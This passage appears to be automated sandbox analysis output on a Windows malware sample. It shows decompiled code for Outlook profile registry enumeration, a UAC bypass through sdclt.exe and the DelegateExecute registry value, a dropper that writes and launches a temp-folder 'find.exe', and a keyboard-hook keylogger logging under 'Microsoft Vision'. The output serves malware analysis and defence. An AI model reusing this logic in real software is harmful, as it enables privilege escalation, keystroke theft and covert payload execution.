                                                                    							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
                                                                    							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
                                                                    							if(__eflags != 0) {
                                                                    								L15:
                                                                    								__eflags = 0;
                                                                    								return 0;
                                                                    							}
                                                                    							_push(_t80);
                                                                    							L8:
                                                                    							lstrcpyW( &_v4116, ??);
                                                                    							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
                                                                    								goto L15;
                                                                    							}
                                                                    							if(_v16 <= _t74) {
                                                                    								L14:
                                                                    								return 1;
                                                                    							} else {
                                                                    								goto L10;
                                                                    							}
                                                                    							while(1) {
                                                                    								L10:
                                                                    								_v12 = 0x800;
                                                                    								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
                                                                    									goto L15;
                                                                    								}
                                                                    								RegCloseKey(_v8);
                                                                    								lstrcpyW( &_v8212,  &_v4116);
                                                                    								lstrcatW( &_v8212, "\\");
                                                                    								lstrcatW( &_v8212,  &_v12308);
                                                                    								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
                                                                    								_t90 = _t68;
                                                                    								if(_t68 != 0) {
                                                                    									goto L15;
                                                                    								}
                                                                    								_push(_t75);
                                                                    								_t75 = _v20;
                                                                    								E02D1A29A(_t75, _t76, _t90, _v8);
                                                                    								RegCloseKey(_v8);
                                                                    								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
                                                                    									goto L15;
                                                                    								}
                                                                    								_t74 = _t74 + 1;
                                                                    								if(_t74 < _v16) {
                                                                    									continue;
                                                                    								}
                                                                    								goto L14;
                                                                    							}
                                                                    							goto L15;
                                                                    						}
                                                                    						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
                                                                    						goto L8;
                                                                    					}
                                                                    					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                                                    					goto L8;
                                                                    				}
                                                                    				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                                                    				goto L8;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 02D1A12F
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 02D1A14C
                                                                    • lstrcpyW.KERNEL32 ref: 02D1A19F
                                                                    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D1A1B5
                                                                    • RegEnumKeyExW.ADVAPI32 ref: 02D1A1E8
                                                                    • RegCloseKey.ADVAPI32(?), ref: 02D1A1F9
                                                                    • lstrcpyW.KERNEL32 ref: 02D1A20D
                                                                    • lstrcatW.KERNEL32(?,02D24684), ref: 02D1A21B
                                                                    • lstrcatW.KERNEL32(?,?), ref: 02D1A22F
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 02D1A24C
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 02D1A261
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 02D1A27E
                                                                    Strings
                                                                    • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A17C, 02D1A181, 02D1A191
                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A15F, 02D1A16F
                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A142, 02D1A152
                                                                    • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A125
                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 02D1A135
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                                                    • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                                                    • API String ID: 1891545080-2020977430
                                                                    • Opcode ID: 649c025dd6160bf7721391dba0527ba1d9d76fca3b6a602169ad30b5e5251d24
                                                                    • Instruction ID: 72855e9c5244cea506b711963bbce564f5df6a302b698de9f2b20b3b2d465556
                                                                    • Opcode Fuzzy Hash: 649c025dd6160bf7721391dba0527ba1d9d76fca3b6a602169ad30b5e5251d24
                                                                    • Instruction Fuzzy Hash: 1F413FB2D4112DBEEB21DA91EC44FFB776CEF14784F100465B909E2601E6719E98DBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E02D21AB9(void* __edx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				char _v12;
                                                                    				struct _SHELLEXECUTEINFOW _v72;
                                                                    				short _v592;
                                                                    				char _v1616;
                                                                    				short* _t53;
                                                                    
                                                                    				if(E02D1FBFC() != 1) {
                                                                    					CloseHandle( *0x2d298b8);
                                                                    					_v8 = 0;
                                                                    					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
                                                                    					if(_v8 != 0) {
                                                                    						_t47 =  &_v12;
                                                                    						E02D1F7E0( &_v12);
                                                                    					}
                                                                    					E02D218BA();
                                                                    					E02D11052( &_v1616, 0, 0x400);
                                                                    					GetModuleFileNameA(0,  &_v1616, 0x400);
                                                                    					E02D21855(_t47, 0x2d26056,  &_v1616);
                                                                    					E02D21855(_t47, "DelegateExecute", 0x2d26056);
                                                                    					GetSystemDirectoryW( &_v592, 0x104);
                                                                    					lstrcatW( &_v592, L"\\sdclt.exe");
                                                                    					_t53 = L"open";
                                                                    					ShellExecuteW(0, _t53,  &_v592, 0, 0, 1);
                                                                    					asm("movaps xmm0, [0x2d27570]");
                                                                    					_v72.lpFile =  &_v592;
                                                                    					_v72.cbSize = 0x3c;
                                                                    					_v72.fMask = 0x40;
                                                                    					_v72.hwnd = 0;
                                                                    					_v72.lpVerb = _t53;
                                                                    					asm("movups [ebp-0x30], xmm0");
                                                                    					ShellExecuteExW( &_v72);
                                                                    					TerminateProcess(_v72.hProcess, 0);
                                                                    					if(_v8 != 0) {
                                                                    						E02D1F7B9( &_v12);
                                                                    					}
                                                                    					Sleep(0x7d0);
                                                                    					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
                                                                    					ExitProcess(0);
                                                                    				}
                                                                    				return 0;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D1FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,745D0770,00000000,745D0770,00000000,?,?,?,?,02D235AB,?), ref: 02D1FC0E
                                                                      • Part of subcall function 02D1FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02D235AB,?), ref: 02D1FC15
                                                                      • Part of subcall function 02D1FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,02D235AB,?), ref: 02D1FC33
                                                                      • Part of subcall function 02D1FBFC: FindCloseChangeNotification.KERNEL32(00000000), ref: 02D1FC48
                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 02D21AD8
                                                                    • GetCurrentProcess.KERNEL32(?), ref: 02D21AE7
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 02D21AEE
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 02D21B25
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02D21B57
                                                                    • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 02D21B69
                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02D21B81
                                                                    • ShellExecuteExW.SHELL32(?), ref: 02D21BB3
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 02D21BBD
                                                                    • Sleep.KERNEL32(000007D0), ref: 02D21BD5
                                                                    • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 02D21BE5
                                                                    • ExitProcess.KERNEL32 ref: 02D21BEC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentExecuteShellToken$ChangeDeleteDirectoryExitFileFindHandleInformationModuleNameNotificationOpenSleepSystemTerminateWow64lstrcat
                                                                    • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                                                    • API String ID: 368901745-2081737068
                                                                    • Opcode ID: b8c8284d5892e6d19c599512c26072315ab34aa2466e1cf4f90e50eff8f1573e
                                                                    • Instruction ID: 00d61bfe10217087769bd71e1a4a0bc55ea751b12de8b33263ef93419d43f0b0
                                                                    • Opcode Fuzzy Hash: b8c8284d5892e6d19c599512c26072315ab34aa2466e1cf4f90e50eff8f1573e
                                                                    • Instruction Fuzzy Hash: 98319C71C41128FBDB21ABA5EC489DEBBBCEF65305F124495F909A2300E7304E59CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E02D230C9(void* __eax, void* __ebx, void* __ecx, void* __edx, signed int __esi, long _a4) {
                                                                    				intOrPtr* _v8;
                                                                    				long _v12;
                                                                    				struct _SHELLEXECUTEINFOA _v72;
                                                                    				char _v1096;
                                                                    				char _v2120;
                                                                    				char _v3144;
                                                                    				void* _t46;
                                                                    				void* _t48;
                                                                    				void* _t77;
                                                                    				void* _t82;
                                                                    				void* _t99;
                                                                    				void* _t104;
                                                                    
                                                                    				 *((intOrPtr*)(_t104 + __esi * 2 - 0x2e)) =  *((intOrPtr*)(_t104 + __esi * 2 - 0x2e)) + __edx;
                                                                    				_t82 = __ecx +  *((intOrPtr*)(__ebx + 0x86183c1));
                                                                    				_t77 = __ebx + __eax;
                                                                    				_push(_t77);
                                                                    				_push(__esi);
                                                                    				_t88 =  *_a4;
                                                                    				_t78 = _t82 + 4;
                                                                    				_v8 = _t82 + 4;
                                                                    				E02D13437(_t78, E02D21DC0( *_a4 + 4,  *_t88));
                                                                    				E02D15EA5(_a4);
                                                                    				_t46 = LoadResource(0, _a4);
                                                                    				_a4 = SizeofResource(0, _a4);
                                                                    				_t48 = LockResource(_t46);
                                                                    				E02D11052( &_v1096, 0, 0x400);
                                                                    				E02D11052( &_v2120, 0, 0x400);
                                                                    				GetTempPathA(0x400,  &_v1096);
                                                                    				lstrcatA( &_v1096, "find.exe");
                                                                    				GetTempPathA(0x400,  &_v2120);
                                                                    				lstrcatA( &_v2120, "find.db");
                                                                    				_t99 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                                                    				WriteFile(_t99, _t48, _a4,  &_v12, 0);
                                                                    				CloseHandle(_t99);
                                                                    				E02D11052( &_v3144, 0, 0x400);
                                                                    				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                                                    				_v72.cbSize = 0x3c;
                                                                    				_v72.lpFile =  &_v1096;
                                                                    				_v72.fMask = 0x40;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				_v72.lpParameters =  &_v3144;
                                                                    				asm("movlpd [ebp-0x20], xmm0");
                                                                    				asm("movlpd [ebp-0x18], xmm0");
                                                                    				asm("movlpd [ebp-0x10], xmm0");
                                                                    				_v72.hwnd = 0;
                                                                    				_v72.lpVerb = 0;
                                                                    				_v72.lpDirectory = 0;
                                                                    				_v72.nShow = 0;
                                                                    				_v72.hInstApp = 0;
                                                                    				return ShellExecuteExA( &_v72);
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • LoadResource.KERNEL32(00000000,?,00000000), ref: 02D23110
                                                                    • SizeofResource.KERNEL32(00000000,?), ref: 02D2311C
                                                                    • LockResource.KERNEL32(00000000), ref: 02D23126
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23160
                                                                    • lstrcatA.KERNEL32(?,find.exe), ref: 02D23174
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23182
                                                                    • lstrcatA.KERNEL32(?,find.db), ref: 02D23190
                                                                    • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 02D231AB
                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D231BD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D231C4
                                                                    • wsprintfA.USER32 ref: 02D231F4
                                                                    • ShellExecuteExA.SHELL32(0000003C), ref: 02D23242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                                    • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                                    • API String ID: 2504251837-265381321
                                                                    • Opcode ID: 5a2c47a93415f3fcea62e985190257b1cf02a8a7a13f75d2632273b21fc380f1
                                                                    • Instruction ID: 1ea1124f750491c1fa162ab8805182852647f45ed54a75deb3624b024e33c80c
                                                                    • Opcode Fuzzy Hash: 5a2c47a93415f3fcea62e985190257b1cf02a8a7a13f75d2632273b21fc380f1
                                                                    • Instruction Fuzzy Hash: 23414CB1C00219ABDB20DFA0DD84EDEBBBCFF99304F114556FA09A2200D7749A49CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 84%
                                                                    			E02D230D5(void* __ecx, void* __eflags, long _a4) {
                                                                    				intOrPtr* _v8;
                                                                    				long _v12;
                                                                    				struct _SHELLEXECUTEINFOA _v72;
                                                                    				char _v1096;
                                                                    				char _v2120;
                                                                    				char _v3144;
                                                                    				void* _t38;
                                                                    				void* _t40;
                                                                    				void* _t83;
                                                                    
                                                                    				_t75 =  *_a4;
                                                                    				_t68 = __ecx + 4;
                                                                    				_v8 = __ecx + 4;
                                                                    				E02D13437(_t68, E02D21DC0( *_a4 + 4,  *_t75));
                                                                    				E02D15EA5(_a4);
                                                                    				_t38 = LoadResource(0, _a4);
                                                                    				_a4 = SizeofResource(0, _a4);
                                                                    				_t40 = LockResource(_t38);
                                                                    				E02D11052( &_v1096, 0, 0x400);
                                                                    				E02D11052( &_v2120, 0, 0x400);
                                                                    				GetTempPathA(0x400,  &_v1096);
                                                                    				lstrcatA( &_v1096, "find.exe");
                                                                    				GetTempPathA(0x400,  &_v2120);
                                                                    				lstrcatA( &_v2120, "find.db");
                                                                    				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                                                    				WriteFile(_t83, _t40, _a4,  &_v12, 0);
                                                                    				CloseHandle(_t83);
                                                                    				E02D11052( &_v3144, 0, 0x400);
                                                                    				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                                                    				_v72.cbSize = 0x3c;
                                                                    				_v72.lpFile =  &_v1096;
                                                                    				_v72.fMask = 0x40;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				_v72.lpParameters =  &_v3144;
                                                                    				asm("movlpd [ebp-0x20], xmm0");
                                                                    				asm("movlpd [ebp-0x18], xmm0");
                                                                    				asm("movlpd [ebp-0x10], xmm0");
                                                                    				_v72.hwnd = 0;
                                                                    				_v72.lpVerb = 0;
                                                                    				_v72.lpDirectory = 0;
                                                                    				_v72.nShow = 0;
                                                                    				_v72.hInstApp = 0;
                                                                    				return ShellExecuteExA( &_v72);
                                                                    			}


                                                                    APIs
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • LoadResource.KERNEL32(00000000,?,00000000), ref: 02D23110
                                                                    • SizeofResource.KERNEL32(00000000,?), ref: 02D2311C
                                                                    • LockResource.KERNEL32(00000000), ref: 02D23126
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23160
                                                                    • lstrcatA.KERNEL32(?,find.exe), ref: 02D23174
                                                                    • GetTempPathA.KERNEL32(00000400,?), ref: 02D23182
                                                                    • lstrcatA.KERNEL32(?,find.db), ref: 02D23190
                                                                    • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 02D231AB
                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D231BD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D231C4
                                                                    • wsprintfA.USER32 ref: 02D231F4
                                                                    • ShellExecuteExA.SHELL32(0000003C), ref: 02D23242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                                                    • String ID: -w %ws -d C -f %s$<$@$find.db$find.exe
                                                                    • API String ID: 2504251837-265381321
                                                                    • Opcode ID: 9b953891f74f5e838be4cebbb062622b8af13b46456230468a971a8261bb6ed4
                                                                    • Instruction ID: 6b9d22386ac0493eb67b6365b5edef14f544335068fb14031452edcdd1afef57
                                                                    • Opcode Fuzzy Hash: 9b953891f74f5e838be4cebbb062622b8af13b46456230468a971a8261bb6ed4
                                                                    • Instruction Fuzzy Hash: 49412CB1D0021DABDB20DFA5DD84EDEBBBCFF99304F114556FA09A2200D7749A498FA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E02D1882F(void* __edx, void* __eflags) {
                                                                    				short _v176;
                                                                    				struct tagMSG _v204;
                                                                    				void* _v208;
                                                                    				struct _SYSTEMTIME _v228;
                                                                    				struct HINSTANCE__* _t19;
                                                                    				intOrPtr _t22;
                                                                    				intOrPtr _t25;
                                                                    				intOrPtr _t27;
                                                                    				intOrPtr _t40;
                                                                    				intOrPtr _t45;
                                                                    				void* _t46;
                                                                    				void* _t49;
                                                                    				intOrPtr* _t50;
                                                                    				void* _t59;
                                                                    				struct HINSTANCE__* _t60;
                                                                    				intOrPtr _t62;
                                                                    				intOrPtr _t64;
                                                                    				intOrPtr _t66;
                                                                    				void* _t68;
                                                                    				void* _t71;
                                                                    				void* _t75;
                                                                    				void* _t79;
                                                                    				void* _t90;
                                                                    
                                                                    				_t90 = __eflags;
                                                                    				_t71 = __edx;
                                                                    				_t19 = GetModuleHandleA(0);
                                                                    				_t62 =  *0x2d296a0; // 0x0
                                                                    				_t60 = _t19;
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				E02D11052(_t62 + 0x210, 0, 0x800);
                                                                    				_t22 =  *0x2d296a0; // 0x0
                                                                    				E02D11052(_t22 + 0x10, 0, 0x208);
                                                                    				_t25 =  *0x2d296a0; // 0x0
                                                                    				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t25 + 0x10, _t75, _t79, _t59);
                                                                    				_t27 =  *0x2d296a0; // 0x0
                                                                    				lstrcatW(_t27 + 0x10, L"\\Microsoft Vision\\");
                                                                    				GetLocalTime( &_v228);
                                                                    				wsprintfW( &(_v204.pt), L"%02d-%02d-%02d_%02d.%02d.%02d", _v228.wDay & 0x0000ffff, _v228.wMonth & 0x0000ffff, _v228.wYear & 0x0000ffff, _v228.wHour & 0x0000ffff, _v228.wMinute & 0x0000ffff, _v228.wSecond & 0x0000ffff);
                                                                    				_t40 =  *0x2d296a0; // 0x0
                                                                    				lstrcatW(_t40 + 0x10,  &_v176);
                                                                    				_t64 =  *0x2d296a0; // 0x0
                                                                    				_t11 = _t64 + 0x10; // 0x10
                                                                    				E02D132FF(_t64 + 0xc, _t71, _t11);
                                                                    				_t45 =  *0x2d296a0; // 0x0
                                                                    				_t46 = CreateFileW( *(_t45 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
                                                                    				_t66 =  *0x2d296a0; // 0x0
                                                                    				 *(_t66 + 4) = _t46;
                                                                    				CloseHandle(_t46);
                                                                    				_v228.wYear = 0;
                                                                    				_t68 = E02D21E21("c:\\windows\\system32\\user32.dll",  &_v228);
                                                                    				_t49 = E02D209D2(_t68, 0, _t90);
                                                                    				_t91 = _t49;
                                                                    				if(_t49 == 0) {
                                                                    					_t50 =  *0x2d2969c; // 0x0
                                                                    				} else {
                                                                    					_push(_t68);
                                                                    					_t50 = E02D20969(_t49, "SetWindowsHookExA", _t91);
                                                                    					 *0x2d2969c = _t50;
                                                                    				}
                                                                    				 *_t50(0xd, E02D189C0, _t60, 0);
                                                                    				while(GetMessageA( &_v204, 0, 0, 0) > 0) {
                                                                    					TranslateMessage( &_v204);
                                                                    					DispatchMessageA( &_v204);
                                                                    				}
                                                                    				return 0;
                                                                    			}


                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 02D18840
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 02D18894
                                                                    • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 02D188AE
                                                                    • GetLocalTime.KERNEL32(?), ref: 02D188B5
                                                                    • wsprintfW.USER32 ref: 02D188E9
                                                                    • lstrcatW.KERNEL32(-00000010,?), ref: 02D18900
                                                                    • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010), ref: 02D1892C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D1893C
                                                                      • Part of subcall function 02D21E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E4E
                                                                      • Part of subcall function 02D21E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E61
                                                                      • Part of subcall function 02D21E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E72
                                                                      • Part of subcall function 02D21E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,02D234BF), ref: 02D21E7F
                                                                      • Part of subcall function 02D209D2: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,761F82B0,00000000,?,?,?,?,02D1895D), ref: 02D209FE
                                                                    • GetMessageA.USER32 ref: 02D189AF
                                                                      • Part of subcall function 02D20969: lstrcmpA.KERNEL32(?,02D21BD0,?,open,02D21BD0), ref: 02D209A2
                                                                    • TranslateMessage.USER32(?), ref: 02D18996
                                                                    • DispatchMessageA.USER32 ref: 02D189A1
                                                                    Strings
                                                                    • SetWindowsHookExA, xrefs: 02D18962
                                                                    • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 02D188E3
                                                                    • \Microsoft Vision\, xrefs: 02D188A8
                                                                    • c:\windows\system32\user32.dll, xrefs: 02D1894A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Message$CloseCreateHandlelstrcat$AllocChangeDispatchFindFolderLocalModuleNotificationPathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                                                    • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                                                    • API String ID: 1641748825-3884914687
                                                                    • Opcode ID: bd962870dd3f69e04f3005b8bf4180c27beb603856c32f1f21f6fa3527ed0b3e
                                                                    • Instruction ID: 66755148b6f5eb4711a26133fc899378e55ebf18ec1dde64a35e5c50093d2779
                                                                    • Opcode Fuzzy Hash: bd962870dd3f69e04f3005b8bf4180c27beb603856c32f1f21f6fa3527ed0b3e
                                                                    • Instruction Fuzzy Hash: 8241B1B1940280BBE720DBAAEC08E6B77ECFBA9705F014819F945D2381D635DD28CB31
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D18E66(void* __ecx, void* __edx, void* __eflags) {
                                                                    				struct _SECURITY_ATTRIBUTES* _v8;
                                                                    				void* _v12;
                                                                    				void* _v16;
                                                                    				short _v536;
                                                                    				int _t35;
                                                                    				intOrPtr _t37;
                                                                    				int _t39;
                                                                    				intOrPtr _t40;
                                                                    				WCHAR* _t41;
                                                                    				intOrPtr _t43;
                                                                    				void* _t44;
                                                                    				int _t46;
                                                                    				intOrPtr _t48;
                                                                    				intOrPtr _t50;
                                                                    				long _t54;
                                                                    				intOrPtr _t55;
                                                                    				intOrPtr _t57;
                                                                    				void* _t59;
